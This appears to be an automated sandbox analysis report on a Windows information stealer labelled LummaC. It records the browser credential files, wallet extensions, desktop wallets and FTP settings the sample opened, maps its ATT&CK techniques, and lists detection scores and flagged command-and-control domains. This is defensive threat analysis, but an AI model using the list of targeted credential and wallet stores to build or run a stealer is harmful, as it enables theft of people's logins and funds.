                Source: C:\Users\user\Desktop\1fxm3u0d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
                Source: C:\Users\user\Desktop\1fxm3u0d.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.jsonJump to behavior
                Source: C:\Users\user\Desktop\1fxm3u0d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
                Source: C:\Users\user\Desktop\1fxm3u0d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
                Source: C:\Users\user\Desktop\1fxm3u0d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
                Source: C:\Users\user\Desktop\1fxm3u0d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
                Source: C:\Users\user\Desktop\1fxm3u0d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Users\user\Desktop\1fxm3u0d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
                Source: C:\Users\user\Desktop\1fxm3u0d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
                Source: C:\Users\user\Desktop\1fxm3u0d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
                Source: C:\Users\user\Desktop\1fxm3u0d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
                Source: C:\Users\user\Desktop\1fxm3u0d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
                Source: C:\Users\user\Desktop\1fxm3u0d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
                Source: C:\Users\user\Desktop\1fxm3u0d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
                Source: C:\Users\user\Desktop\1fxm3u0d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
                Source: C:\Users\user\Desktop\1fxm3u0d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Users\user\Desktop\1fxm3u0d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
                Source: C:\Users\user\Desktop\1fxm3u0d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
                Source: C:\Users\user\Desktop\1fxm3u0d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
                Source: C:\Users\user\Desktop\1fxm3u0d.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqliteJump to behavior
                Source: C:\Users\user\Desktop\1fxm3u0d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
                Source: C:\Users\user\Desktop\1fxm3u0d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
                Source: C:\Users\user\Desktop\1fxm3u0d.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.dbJump to behavior
                Source: C:\Users\user\Desktop\1fxm3u0d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
                Source: C:\Users\user\Desktop\1fxm3u0d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
                Source: C:\Users\user\Desktop\1fxm3u0d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
                Source: C:\Users\user\Desktop\1fxm3u0d.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
                Source: C:\Users\user\Desktop\1fxm3u0d.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
                Source: C:\Users\user\Desktop\1fxm3u0d.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
                Source: C:\Users\user\Desktop\1fxm3u0d.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
                Source: C:\Users\user\Desktop\1fxm3u0d.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
                Source: C:\Users\user\Desktop\1fxm3u0d.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
                Source: C:\Users\user\Desktop\1fxm3u0d.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
                Source: C:\Users\user\Desktop\1fxm3u0d.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\Desktop\1fxm3u0d.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\Desktop\1fxm3u0d.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                Source: C:\Users\user\Desktop\1fxm3u0d.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                Source: C:\Users\user\Desktop\1fxm3u0d.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\Desktop\1fxm3u0d.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\Desktop\1fxm3u0d.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                Source: C:\Users\user\Desktop\1fxm3u0d.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                Source: C:\Users\user\Desktop\1fxm3u0d.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                Source: C:\Users\user\Desktop\1fxm3u0d.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                Source: C:\Users\user\Desktop\1fxm3u0d.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                Source: C:\Users\user\Desktop\1fxm3u0d.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                Source: C:\Users\user\Desktop\1fxm3u0d.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\1fxm3u0d.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\1fxm3u0d.exeDirectory queried: C:\Users\user\Documents\VWDFPKGDUFJump to behavior
                Source: C:\Users\user\Desktop\1fxm3u0d.exeDirectory queried: C:\Users\user\Documents\VWDFPKGDUFJump to behavior
                Source: Yara matchFile source: 00000003.00000003.2283579467.000000000340F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000003.2280589839.0000000003405000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000003.2280756454.0000000003405000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: 1fxm3u0d.exe PID: 6596, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: 1fxm3u0d.exe PID: 6596, type: MEMORYSTR
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                Windows Management Instrumentation
                1
                DLL Side-Loading
                211
                Process Injection
                12
                Virtualization/Sandbox Evasion
                2
                OS Credential Dumping
                1
                System Time Discovery
                Remote Services1
                Archive Collected Data
                11
                Encrypted Channel
                Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts1
                PowerShell
                Boot or Logon Initialization Scripts1
                DLL Side-Loading
                211
                Process Injection
                LSASS Memory1
                Query Registry
                Remote Desktop Protocol41
                Data from Local System
                1
                Ingress Tool Transfer
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                Deobfuscate/Decode Files or Information
                Security Account Manager151
                Security Software Discovery
                SMB/Windows Admin SharesData from Network Shared Drive3
                Non-Application Layer Protocol
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook3
                Obfuscated Files or Information
                NTDS12
                Virtualization/Sandbox Evasion
                Distributed Component Object ModelInput Capture114
                Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
                Software Packing
                LSA Secrets1
                Process Discovery
                SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                DLL Side-Loading
                Cached Domain Credentials11
                File and Directory Discovery
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync43
                System Information Discovery
                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                1fxm3u0d.exe58%VirustotalBrowse
                1fxm3u0d.exe68%ReversingLabsWin32.Trojan.LummaC
                1fxm3u0d.exe100%Joe Sandbox ML
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                SourceDetectionScannerLabelLink
                https://lev-tolstoi.com/r0%Avira URL Cloudsafe
                https://authorisev.site/api100%Avira URL Cloudphishing
                https://lev-tolstoi.com/api30Qy0%Avira URL Cloudsafe
                https://lev-tolstoi.com/U0%Avira URL Cloudsafe
                https://lev-tolstoi.com/apimalISo0%Avira URL Cloudsafe
                https://faulteyotk.site/api(100%Avira URL Cloudmalware
                https://lev-tolstoi.com/0%Avira URL Cloudsafe
                https://lev-tolstoi.com/api0%Avira URL Cloudsafe
                https://lev-tolstoi.com/apidE0%Avira URL Cloudsafe
                https://servicedny.site/apiP100%Avira URL Cloudmalware
                https://lev-tolstoi.com/A0%Avira URL Cloudsafe
                https://lev-tolstoi.com/api00%Avira URL Cloudsafe
                https://lev-tolstoi.com/apic0%Avira URL Cloudsafe
                https://lev-tolstoi.com:443/api0%Avira URL Cloudsafe
                NameIPActiveMaliciousAntivirus DetectionReputation
                steamcommunity.com
                23.55.153.106
                truefalse
                  high
                  lev-tolstoi.com
                  104.21.66.86
                  truetrue
                    unknown
                    thighpecr.cyou
                    unknown
                    unknowntrue
                      unknown
                      goalyfeastz.site
                      unknown
                      unknownfalse
                        high
                        servicedny.site
                        unknown
                        unknownfalse
                          high
                          contemteny.site
                          unknown
                          unknownfalse
                            high
                            faulteyotk.site
                            unknown
                            unknownfalse
                              high
                              opposezmny.site
                              unknown
                              unknownfalse
                                high
                                seallysl.site
                                unknown
                                unknownfalse
                                  high
                                  dilemmadu.site
                                  unknown
                                  unknownfalse
                                    high
                                    authorisev.site
                                    unknown
                                    unknownfalse
                                      high
                                      NameMaliciousAntivirus DetectionReputation
                                      https://steamcommunity.com/profiles/76561199724331900false
                                        high
                                        goalyfeastz.sitefalse
                                          high
                                          https://lev-tolstoi.com/apitrue
                                          • Avira URL Cloud: safe
                                          unknown
                                          seallysl.sitefalse
                                            high
                                            dilemmadu.sitefalse
                                              high
                                              thighpecr.cyoufalse
                                                high
                                                contemteny.sitefalse
                                                  high
                                                  opposezmny.sitefalse
                                                    high
                                                    servicedny.sitefalse
                                                      high
                                                      authorisev.sitefalse
                                                        high
                                                        faulteyotk.sitefalse
                                                          high
                                                          NameSourceMaliciousAntivirus DetectionReputation
                                                          https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            high
                                                            https://duckduckgo.com/chrome_newtab1fxm3u0d.exe, 00000003.00000003.2193618825.0000000005A8A000.00000004.00000800.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2193777307.0000000005A87000.00000004.00000800.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2193683673.0000000005A87000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://duckduckgo.com/ac/?q=1fxm3u0d.exe, 00000003.00000003.2193618825.0000000005A8A000.00000004.00000800.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2193777307.0000000005A87000.00000004.00000800.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2193683673.0000000005A87000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://steamcommunity.com/profiles/76561199724331900cs1fxm3u0d.exe, 00000003.00000003.2167175724.0000000003390000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165613383.0000000003390000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://steamcommunity.com/?subsection=broadcasts1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://lev-tolstoi.com/r1fxm3u0d.exe, 00000003.00000003.2381436216.0000000003405000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000002.2386904956.0000000003405000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2370076676.0000000003405000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2308206349.0000000003405000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2320693548.0000000003405000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      https://store.steampowered.com/subscriber_agreement/1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        high
                                                                        http://www.valvesoftware.com/legal.htm1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&l=en1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://lev-tolstoi.com/U1fxm3u0d.exe, 00000003.00000003.2280589839.0000000003405000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2280756454.0000000003405000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af61fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=engl1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englis1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=0Xxx1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=11fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=en1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://lev-tolstoi.com/1fxm3u0d.exe, 00000003.00000003.2280756454.0000000003405000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165300750.00000000033CB000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2167175724.0000000003390000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165613383.0000000003390000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000002.2386552743.000000000336E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              unknown
                                                                                              http://store.steampowered.com/privacy_agreement/1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://store.steampowered.com/points/shop/1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=1fxm3u0d.exe, 00000003.00000003.2193618825.0000000005A8A000.00000004.00000800.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2193777307.0000000005A87000.00000004.00000800.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2193683673.0000000005A87000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    http://crl.rootca1.amazontrust.com/rootca1.crl01fxm3u0d.exe, 00000003.00000003.2258291681.0000000005A6F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://faulteyotk.site/api(1fxm3u0d.exe, 00000003.00000003.2165613383.00000000033A0000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2167175724.00000000033A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: malware
                                                                                                      unknown
                                                                                                      http://ocsp.rootca1.amazontrust.com0:1fxm3u0d.exe, 00000003.00000003.2258291681.0000000005A6F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&a1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://www.ecosia.org/newtab/1fxm3u0d.exe, 00000003.00000003.2193618825.0000000005A8A000.00000004.00000800.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2193777307.0000000005A87000.00000004.00000800.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2193683673.0000000005A87000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://steamcommunity.com/profiles/76561199724331900/inventory/1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br1fxm3u0d.exe, 00000003.00000003.2259261671.0000000005D78000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://store.steampowered.com/privacy_agreement/1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l=eng1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    https://authorisev.site/api1fxm3u0d.exe, 00000003.00000003.2165613383.00000000033A0000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2167175724.00000000033A0000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                    • Avira URL Cloud: phishing
                                                                                                                    unknown
                                                                                                                    https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&am1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      https://servicedny.site/apiP1fxm3u0d.exe, 00000003.00000003.2165613383.00000000033A0000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2167175724.00000000033A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      • Avira URL Cloud: malware
                                                                                                                      unknown
                                                                                                                      https://steamcommunity.com/w1fxm3u0d.exe, 00000003.00000003.2280589839.000000000339C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=THDq-gsQ1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          https://store.steampowered.com/about/1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            https://steamcommunity.com/my/wishlist/1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                https://help.steampowered.com/en/1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://steamcommunity.com/market/1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://store.steampowered.com/news/1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=1fxm3u0d.exe, 00000003.00000003.2193618825.0000000005A8A000.00000004.00000800.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2193777307.0000000005A87000.00000004.00000800.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2193683673.0000000005A87000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        http://store.steampowered.com/subscriber_agreement/1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            https://steamcommunity.com/discussions/1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              https://lev-tolstoi.com/apimalISo1fxm3u0d.exe, 00000003.00000002.2386928574.0000000003417000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                              unknown
